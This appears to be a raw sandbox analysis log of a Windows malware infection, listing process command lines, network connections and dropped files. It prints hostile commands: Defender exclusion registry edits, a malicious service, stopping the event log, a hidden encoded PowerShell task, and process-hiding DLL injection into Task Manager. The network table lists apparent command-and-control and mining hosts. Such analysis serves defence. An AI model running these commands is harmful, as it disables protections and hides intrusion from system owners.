"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5684.7.1883471339\268086337" -childID 4 -isForBrowser -prefsHandle 5544 -prefMapHandle 5264 -prefsLen 26486 -prefMapSize 233480 -jsInitHandle 972 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6e1ace20-eab0-44f3-9cbe-fbbc77f222e3} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" 5556 24bce9e0658 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5684.10.808435501\1696470453" -childID 7 -isForBrowser -prefsHandle 5864 -prefMapHandle 5544 -prefsLen 26486 -prefMapSize 233480 -jsInitHandle 972 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a2625ed8-c874-43c8-8d53-dc1329b17134} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" 5768 24bb3f68158 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.linkedin.com/login
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.facebook.com/login
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff26379758,0x7fff26379768,0x7fff26379778
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\HLfrKneGcZPtnWVS /t REG_DWORD /d 0 /reg:32
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "THYAWYFT"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\HLfrKneGcZPtnWVS /t REG_DWORD /d 0 /reg:64
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5684.11.285895284\63954093" -childID 8 -isForBrowser -prefsHandle 6416 -prefMapHandle 5700 -prefsLen 26486 -prefMapSize 233480 -jsInitHandle 972 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {114ba84e-8841-4789-b131-8224bb4accd1} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" 6196 24bcc56b858 tab
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "THYAWYFT" binpath= "C:\ProgramData\mkiurbjjkopl\vzxmpncsktsu.exe" start= "auto"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gwdUevBUP" /SC once /ST 04:47:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "THYAWYFT"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1696 --field-trial-handle=2272,i,16153570334640286194,4951201426470596470,131072 /prefetch:2
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gwdUevBUP"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3040 --field-trial-handle=2272,i,16153570334640286194,4951201426470596470,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3076 --field-trial-handle=2272,i,16153570334640286194,4951201426470596470,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3864 --field-trial-handle=2272,i,16153570334640286194,4951201426470596470,131072 /prefetch:1
C:\Windows\explorer.exe
explorer.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1904 --field-trial-handle=2272,i,16153570334640286194,4951201426470596470,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1876 --field-trial-handle=2272,i,16153570334640286194,4951201426470596470,131072 /prefetch:8
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\ProgramData\mkiurbjjkopl\vzxmpncsktsu.exe
C:\ProgramData\mkiurbjjkopl\vzxmpncsktsu.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/login
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/login
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://accounts.google.com
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff26379758,0x7fff26379768,0x7fff26379778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4708 --field-trial-handle=2272,i,16153570334640286194,4951201426470596470,131072 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | duikosgreec.pro | udp |
| US | 104.21.90.102:443 | duikosgreec.pro | tcp |
| US | 104.21.90.102:443 | duikosgreec.pro | tcp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| GB | 96.17.179.205:80 | apps.identrust.com | tcp |
| NL | 188.72.236.34:443 | scudspatioseparatist.com | tcp |
| US | 172.67.147.136:443 | zuh720.com | tcp |
| US | 8.8.8.8:53 | 136.147.67.172.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| DE | 77.105.147.130:80 | 77.105.147.130 | tcp |
| US | 104.26.8.59:443 | api.myip.com | tcp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| RU | 147.45.47.101:80 | 147.45.47.101 | tcp |
| RU | 87.240.132.72:80 | vk.com | tcp |
| RU | 87.240.132.72:80 | vk.com | tcp |
| US | 8.8.8.8:53 | cleued.com | udp |
| RU | 5.42.65.115:80 | 5.42.65.115 | tcp |
| US | 8.8.8.8:53 | medfioytrkdkcodlskeej.net | udp |
| US | 8.8.8.8:53 | 294down-river.sbs | udp |
| US | 8.8.8.8:53 | flex.sunaviat.com | udp |
| DE | 185.172.128.127:80 | 185.172.128.127 | tcp |
| US | 8.8.8.8:53 | monoblocked.com | udp |
| US | 172.67.215.205:80 | acenitive.shop | tcp |
| RU | 91.215.85.209:80 | medfioytrkdkcodlskeej.net | tcp |
| US | 172.67.215.205:80 | acenitive.shop | tcp |
| US | 172.67.221.35:80 | flex.sunaviat.com | tcp |
| US | 172.67.154.10:80 | cleued.com | tcp |
| US | 172.67.180.151:80 | 294down-river.sbs | tcp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| US | 172.67.215.205:80 | acenitive.shop | tcp |
| US | 172.67.215.205:80 | acenitive.shop | tcp |
| US | 172.67.154.10:80 | cleued.com | tcp |
| RU | 87.240.132.72:80 | vk.com | tcp |
| RU | 87.240.132.72:80 | vk.com | tcp |
| RU | 91.215.85.209:80 | medfioytrkdkcodlskeej.net | tcp |
| US | 172.67.215.205:443 | acenitive.shop | tcp |
| US | 172.67.215.205:443 | acenitive.shop | tcp |
| US | 172.67.154.10:443 | cleued.com | tcp |
| US | 172.67.180.151:443 | 294down-river.sbs | tcp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| RU | 87.240.132.72:80 | vk.com | tcp |
| RU | 87.240.132.72:80 | vk.com | tcp |
| RU | 91.215.85.209:443 | medfioytrkdkcodlskeej.net | tcp |
| PE | 190.187.52.42:80 | trmpc.com | tcp |
| RU | 87.240.132.72:80 | vk.com | tcp |
| RU | 87.240.132.72:80 | vk.com | tcp |
| RU | 45.130.41.108:443 | monoblocked.com | tcp |
| US | 8.8.8.8:53 | 10.154.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.180.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.85.215.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.41.130.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.52.187.190.in-addr.arpa | udp |
| RU | 87.240.132.72:80 | vk.com | tcp |
| RU | 87.240.132.72:80 | vk.com | tcp |
| RU | 87.240.132.72:80 | vk.com | tcp |
| PE | 190.187.52.42:80 | trmpc.com | tcp |
| US | 172.67.156.81:443 | tcp | |
| RU | 87.240.132.72:80 | vk.com | tcp |
| RU | 87.240.132.72:80 | vk.com | tcp |
| RU | 87.240.132.72:80 | vk.com | tcp |
| RU | 87.240.132.72:80 | vk.com | tcp |
| NL | 194.104.136.64:443 | 632432.site | tcp |
| RU | 87.240.132.72:80 | vk.com | tcp |
| RU | 87.240.132.72:80 | vk.com | tcp |
| RU | 87.240.132.72:443 | vk.com | tcp |
| RU | 87.240.132.72:443 | vk.com | tcp |
| RU | 87.240.132.72:80 | vk.com | tcp |
| RU | 87.240.132.72:443 | vk.com | tcp |
| NL | 95.142.206.0:443 | sun6-20.userapi.com | tcp |
| NL | 95.142.206.2:443 | sun6-22.userapi.com | tcp |
| RU | 87.240.132.72:443 | vk.com | tcp |
| RU | 87.240.132.72:443 | vk.com | tcp |
| RU | 87.240.137.140:443 | psv4.userapi.com | tcp |
| RU | 87.240.132.72:443 | vk.com | tcp |
| NL | 95.142.206.0:443 | sun6-20.userapi.com | tcp |
| RU | 87.240.132.72:443 | vk.com | tcp |
| RU | 87.240.137.140:443 | psv4.userapi.com | tcp |
| RU | 87.240.132.72:443 | vk.com | tcp |
| RU | 87.240.132.72:443 | vk.com | tcp |
| NL | 95.142.206.1:443 | sun6-21.userapi.com | tcp |
| DE | 185.172.128.24:80 | 185.172.128.24 | tcp |
| DE | 77.105.147.130:80 | 77.105.147.130 | tcp |
| US | 104.21.63.150:443 | iplis.ru | tcp |
| US | 104.21.4.208:443 | iplogger.org | tcp |
| RU | 193.233.132.62:50500 | tcp | |
| RU | 193.233.132.67:50505 | tcp | |
| DE | 77.105.147.130:80 | 77.105.147.130 | tcp |
| US | 104.26.8.59:443 | api.myip.com | tcp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| NL | 195.20.16.46:80 | 195.20.16.46 | tcp |
| NL | 195.20.16.46:80 | 195.20.16.46 | tcp |
| DE | 185.172.128.90:80 | 185.172.128.90 | tcp |
| RU | 193.233.132.67:50500 | tcp | |
| RU | 193.233.132.49:50500 | tcp | |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| RU | 185.215.113.46:80 | 185.215.113.46 | tcp |
| US | 172.67.147.32:443 | iplis.ru | tcp |
| US | 172.67.132.113:443 | iplogger.org | tcp |
| NL | 195.20.16.46:80 | 195.20.16.46 | tcp |
| GB | 142.250.200.46:443 | www.youtube.com | tcp |
| NL | 108.177.119.84:443 | accounts.google.com | tcp |
| US | 13.107.42.14:443 | www.linkedin.com | tcp |
| GB | 157.240.221.35:443 | www.facebook.com | tcp |
| NL | 108.177.119.84:443 | accounts.google.com | udp |
| GB | 157.240.221.35:443 | www.facebook.com | tcp |
| GB | 142.250.200.46:443 | www.youtube.com | udp |
| GB | 216.58.212.214:443 | i.ytimg.com | tcp |
| GB | 163.70.147.23:443 | scontent-lhr6-1.xx.fbcdn.net | tcp |
| GB | 163.70.147.23:443 | scontent-lhr6-1.xx.fbcdn.net | tcp |
| GB | 163.70.147.23:443 | scontent-lhr6-1.xx.fbcdn.net | tcp |
| GB | 163.70.147.23:443 | scontent-lhr6-1.xx.fbcdn.net | tcp |
| GB | 163.70.147.23:443 | scontent-lhr6-1.xx.fbcdn.net | tcp |
| GB | 163.70.147.23:443 | scontent-lhr6-1.xx.fbcdn.net | tcp |
| GB | 157.240.214.11:443 | scontent-lhr8-2.xx.fbcdn.net | tcp |
| GB | 157.240.214.11:443 | scontent-lhr8-2.xx.fbcdn.net | tcp |
| GB | 163.70.151.21:443 | scontent-lhr6-2.xx.fbcdn.net | tcp |
| GB | 163.70.151.21:443 | scontent-lhr6-2.xx.fbcdn.net | tcp |
| GB | 142.250.178.4:443 | www.google.com | tcp |
| GB | 142.250.178.4:443 | www.google.com | tcp |
| GB | 142.250.200.14:443 | play.google.com | tcp |
| GB | 142.250.200.14:443 | play.google.com | udp |
| FR | 152.199.21.118:443 | static.licdn.com | tcp |
| FR | 152.199.21.118:443 | static.licdn.com | tcp |
| FR | 152.199.21.118:443 | static.licdn.com | tcp |
| US | 144.2.9.1:443 | ponf.linkedin.com | tcp |
| US | 144.2.9.1:443 | ponf.linkedin.com | tcp |
| US | 152.199.22.144:443 | platform.linkedin.com | tcp |
| RU | 5.42.65.31:48396 | tcp | |
| RU | 91.215.85.120:80 | selebration17io.io | tcp |
| GB | 142.250.144.127:19302 | stun.l.google.com | udp |
| GB | 142.250.144.127:19302 | stun.l.google.com | udp |
| RU | 193.233.132.67:50500 | tcp | |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| RU | 185.215.113.32:80 | 185.215.113.32 | tcp |
| RU | 193.233.132.167:80 | 193.233.132.167 | tcp |
| FR | 157.240.202.35:443 | www.facebook.com | tcp |
| US | 34.117.237.239:443 | contile.services.mozilla.com | tcp |
| US | 34.160.144.191:443 | content-signature-2.cdn.mozilla.net | tcp |
| FR | 157.240.202.35:443 | www.facebook.com | udp |
| US | 44.227.167.82:443 | shavar.services.mozilla.com | tcp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| US | 34.107.243.93:443 | push.services.mozilla.com | tcp |
| GB | 142.250.200.46:443 | www.youtube.com | tcp |
| GB | 142.250.200.46:443 | www.youtube.com | udp |
| NL | 108.177.119.84:443 | accounts.google.com | tcp |
| NL | 108.177.119.84:443 | accounts.google.com | udp |
| GB | 142.250.200.14:443 | play.google.com | udp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| RU | 193.233.132.49:50500 | tcp | |
| GB | 172.217.16.238:443 | www3.l.google.com | tcp |
| GB | 172.217.16.238:443 | www3.l.google.com | udp |
| GB | 142.250.178.4:443 | www.google.com | tcp |
| GB | 142.250.178.4:443 | www.google.com | udp |
| RU | 193.233.132.62:50500 | tcp | |
| AE | 146.70.131.223:2404 | xrootx.zapto.org | tcp |
| NL | 108.177.119.84:443 | accounts.google.com | tcp |
| NL | 108.177.119.84:443 | accounts.google.com | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| RU | 193.233.132.62:50500 | tcp | |
| RU | 193.233.132.62:50500 | tcp | |
| DE | 185.172.128.19:80 | 185.172.128.19 | tcp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| RU | 185.215.113.32:80 | 185.215.113.32 | tcp |
| GB | 142.250.200.14:443 | play.google.com | tcp |
| GB | 142.250.200.14:443 | play.google.com | tcp |
| GB | 142.250.200.14:443 | play.google.com | udp |
| RU | 193.233.132.62:50500 | tcp | |
| US | 188.114.96.2:443 | secretionsuitcasenioise.shop | tcp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| AE | 146.70.131.223:2404 | xrootx.zapto.org | tcp |
| AE | 146.70.131.223:2404 | xrootx.zapto.org | tcp |
| US | 172.67.180.132:443 | technologyenterdo.shop | tcp |
| RU | 91.215.85.209:443 | medfioytrkdkcodlskeej.net | tcp |
| US | 104.21.60.92:443 | detectordiscusser.shop | tcp |
| RU | 185.215.113.32:80 | 185.215.113.32 | tcp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 209.208.97.74:443 | www.smszone.in | tcp |
| US | 209.208.97.74:443 | www.smszone.in | tcp |
| GB | 163.70.147.2:443 | video-lhr6-1.xx.fbcdn.net | tcp |
| GB | 163.70.147.2:443 | video-lhr6-1.xx.fbcdn.net | tcp |
| GB | 163.70.147.2:443 | video-lhr6-1.xx.fbcdn.net | tcp |
| GB | 163.70.147.2:443 | video-lhr6-1.xx.fbcdn.net | tcp |
| GB | 163.70.147.2:443 | video-lhr6-1.xx.fbcdn.net | tcp |
| GB | 163.70.147.2:443 | video-lhr6-1.xx.fbcdn.net | tcp |
| US | 104.21.47.178:443 | mealroomrallpassiveer.shop | tcp |
| US | 172.67.202.191:443 | turkeyunlikelyofw.shop | tcp |
| US | 188.114.97.2:443 | secretionsuitcasenioise.shop | tcp |
| US | 172.67.147.18:443 | associationokeo.shop | tcp |
| US | 188.114.97.2:443 | secretionsuitcasenioise.shop | tcp |
| GB | 157.240.214.18:443 | video-lhr8-2.xx.fbcdn.net | tcp |
| GB | 163.70.151.12:443 | video-lhr6-2.xx.fbcdn.net | tcp |
| GB | 163.70.151.12:443 | video-lhr6-2.xx.fbcdn.net | tcp |
| GB | 163.70.151.12:443 | video-lhr6-2.xx.fbcdn.net | tcp |
| GB | 163.70.151.12:443 | video-lhr6-2.xx.fbcdn.net | tcp |
| GB | 163.70.151.12:443 | video-lhr6-2.xx.fbcdn.net | tcp |
| US | 172.67.199.120:443 | claimconcessionrebe.shop | tcp |
| GB | 157.240.221.10:443 | video-lhr8-1.xx.fbcdn.net | tcp |
| MX | 201.119.134.214:80 | trmpc.com | tcp |
| US | 172.67.182.52:443 | liabilityarrangemenyit.shop | tcp |
| DE | 185.172.128.90:80 | 185.172.128.90 | tcp |
| DE | 185.172.128.127:80 | 185.172.128.127 | tcp |
| US | 104.21.77.52:443 | triangleseasonbenchwj.shop | tcp |
| US | 188.114.97.2:443 | secretionsuitcasenioise.shop | tcp |
| US | 172.67.221.35:80 | mobile.sunaviat.com | tcp |
| DE | 185.172.128.145:80 | 185.172.128.145 | tcp |
| US | 188.114.97.2:443 | secretionsuitcasenioise.shop | tcp |
| TR | 217.195.207.156:47721 | tcp | |
| US | 172.67.199.120:443 | claimconcessionrebe.shop | tcp |
| US | 172.67.182.52:443 | liabilityarrangemenyit.shop | tcp |
| GB | 163.70.147.35:443 | star-mini.c10r.facebook.com | tcp |
| GB | 163.70.147.2:443 | video-lhr6-1.xx.fbcdn.net | tcp |
| GB | 163.70.147.2:443 | video-lhr6-1.xx.fbcdn.net | tcp |
| GB | 216.58.212.202:443 | content-autofill.googleapis.com | tcp |
| US | 13.107.42.14:443 | www.linkedin.com | tcp |
| US | 13.107.42.14:443 | www.linkedin.com | tcp |
| NL | 108.177.119.84:443 | accounts.google.com | udp |
| DE | 87.118.96.154:9001 | tcp | |
| US | 147.135.64.217:443 | tcp | |
| DE | 46.4.95.21:9001 | tcp | |
| DE | 5.9.66.94:54782 | tcp | |
| US | 8.8.8.8:53 | 21.95.4.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.66.9.5.in-addr.arpa | udp |
| RU | 5.42.65.31:48396 | tcp | |
| DE | 185.172.128.33:8970 | tcp | |
| US | 198.0.116.146:9001 | tcp | |
| NL | 93.119.11.74:443 | timeapi.io | tcp |
| NL | 93.119.11.74:443 | timeapi.io | tcp |
| NL | 45.15.156.209:40481 | tcp | |
| US | 8.8.8.8:53 | 209.156.15.45.in-addr.arpa | udp |
| NL | 93.119.11.74:443 | timeapi.io | tcp |
| NL | 93.119.11.74:443 | timeapi.io | tcp |
| DE | 5.9.66.94:54782 | tcp | |
| NL | 93.119.11.74:443 | timeapi.io | tcp |
| AT | 5.42.64.33:80 | 5.42.64.33 | tcp |
| DE | 46.4.95.21:9001 | tcp | |
| NL | 93.119.11.74:443 | timeapi.io | tcp |
| NL | 93.119.11.74:443 | timeapi.io | tcp |
| DE | 20.218.68.91:13817 | tcp | |
| NL | 93.119.11.74:443 | timeapi.io | tcp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| NL | 93.119.11.74:443 | timeapi.io | tcp |
| NL | 93.119.11.74:443 | timeapi.io | tcp |
| LT | 91.211.247.248:53 | bfbkiqo.com | udp |
| US | 8.8.8.8:53 | 248.247.211.91.in-addr.arpa | udp |
| IT | 185.196.8.22:80 | bfbkiqo.com | tcp |
| NL | 93.119.11.74:443 | timeapi.io | tcp |
| NL | 93.119.11.74:443 | timeapi.io | tcp |
| NL | 93.119.11.74:443 | timeapi.io | tcp |
| NL | 93.119.11.74:443 | timeapi.io | tcp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| DE | 185.172.128.109:80 | 185.172.128.109 | tcp |
| GB | 104.86.110.112:443 | tcp | |
| NL | 93.119.11.74:443 | timeapi.io | tcp |
| US | 198.0.116.146:9001 | tcp | |
| US | 52.182.141.63:443 | browser.pipe.aria.microsoft.com | tcp |
| NL | 93.119.11.74:443 | timeapi.io | tcp |
| DE | 185.172.128.90:80 | 185.172.128.90 | tcp |
| NL | 93.119.11.74:443 | timeapi.io | tcp |
| GB | 92.123.128.147:443 | r.bing.com | tcp |
| GB | 92.123.128.147:443 | r.bing.com | tcp |
| GB | 92.123.128.147:443 | r.bing.com | tcp |
| GB | 92.123.128.147:443 | r.bing.com | tcp |
| GB | 216.58.204.78:443 | google.com | tcp |
| NL | 93.119.11.74:443 | timeapi.io | tcp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| NL | 93.119.11.74:443 | timeapi.io | tcp |
| GB | 142.250.178.4:443 | www.google.com | tcp |
| GB | 142.250.200.46:443 | www.youtube.com | tcp |
| DE | 185.172.128.127:80 | 185.172.128.127 | tcp |
| NL | 93.119.11.74:443 | timeapi.io | tcp |
| GB | 92.123.128.147:443 | r.bing.com | tcp |
| GB | 92.123.128.147:443 | r.bing.com | tcp |
| DE | 185.172.128.145:80 | 185.172.128.145 | tcp |
| NL | 93.119.11.74:443 | timeapi.io | tcp |
| NL | 93.119.11.74:443 | timeapi.io | tcp |
| NL | 93.119.11.74:443 | timeapi.io | tcp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| GB | 142.250.200.46:443 | www.youtube.com | tcp |
| US | 34.117.237.239:443 | contile.services.mozilla.com | tcp |
| US | 34.160.144.191:443 | content-signature-2.cdn.mozilla.net | tcp |
| GB | 142.250.200.46:443 | www.youtube.com | udp |
| GB | 216.58.212.214:443 | i.ytimg.com | tcp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| US | 34.107.243.93:443 | push.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| GB | 216.58.212.214:443 | i.ytimg.com | udp |
| NL | 93.119.11.74:443 | timeapi.io | tcp |
| NL | 108.177.119.84:443 | accounts.google.com | tcp |
| NL | 108.177.119.84:443 | accounts.google.com | udp |
| GB | 142.250.178.4:443 | www.google.com | tcp |
| NL | 93.119.11.74:443 | timeapi.io | tcp |
| GB | 142.250.178.4:443 | www.google.com | udp |
| NL | 172.217.132.233:443 | rr4---sn-5hne6n6e.googlevideo.com | tcp |
| NL | 172.217.132.233:443 | rr4---sn-5hne6n6e.googlevideo.com | tcp |
| US | 13.107.42.14:443 | www.linkedin.com | tcp |
| NL | 93.119.11.74:443 | timeapi.io | tcp |
| FR | 152.199.21.118:443 | cs1404.wpc.epsiloncdn.net | tcp |
| FR | 152.199.21.118:443 | cs1404.wpc.epsiloncdn.net | tcp |
| FR | 152.199.21.118:443 | cs1404.wpc.epsiloncdn.net | tcp |
| FR | 152.199.21.118:443 | cs1404.wpc.epsiloncdn.net | tcp |
| FR | 152.199.21.118:443 | cs1404.wpc.epsiloncdn.net | tcp |
| FR | 152.199.21.118:443 | cs1404.wpc.epsiloncdn.net | tcp |
| US | 144.2.9.1:443 | ponf.linkedin.com | tcp |
| NL | 93.119.11.74:443 | timeapi.io | tcp |
| NL | 108.177.119.84:443 | accounts.google.com | tcp |
| NL | 108.177.119.84:443 | accounts.google.com | tcp |
| GB | 142.250.144.127:19302 | stun.l.google.com | udp |
| GB | 142.250.144.127:19302 | stun.l.google.com | udp |
| US | 152.199.22.144:443 | platform.linkedin.com | tcp |
| NL | 108.177.119.84:443 | accounts.google.com | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| GB | 142.250.200.14:443 | play.google.com | tcp |
| NL | 93.119.11.74:443 | timeapi.io | tcp |
| GB | 142.250.200.14:443 | play.google.com | udp |
| GB | 163.70.147.35:443 | facebook.com | tcp |
| GB | 163.70.147.23:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.147.23:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.147.23:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.147.23:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.147.23:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.147.23:443 | static.xx.fbcdn.net | udp |
| NL | 93.119.11.74:443 | timeapi.io | tcp |
| GB | 163.70.147.35:443 | facebook.com | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| GB | 163.70.147.23:443 | static.xx.fbcdn.net | udp |
| GB | 163.70.147.23:443 | static.xx.fbcdn.net | tcp |
| GB | 216.58.212.202:443 | content-autofill.googleapis.com | tcp |
| NL | 93.119.11.74:443 | timeapi.io | tcp |
| NL | 93.119.11.74:443 | timeapi.io | tcp |
| NL | 108.177.119.84:443 | accounts.google.com | tcp |
Files
\??\pipe\LOCAL\crashpad_4160_EMYSBVWCJFNAPXIB
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
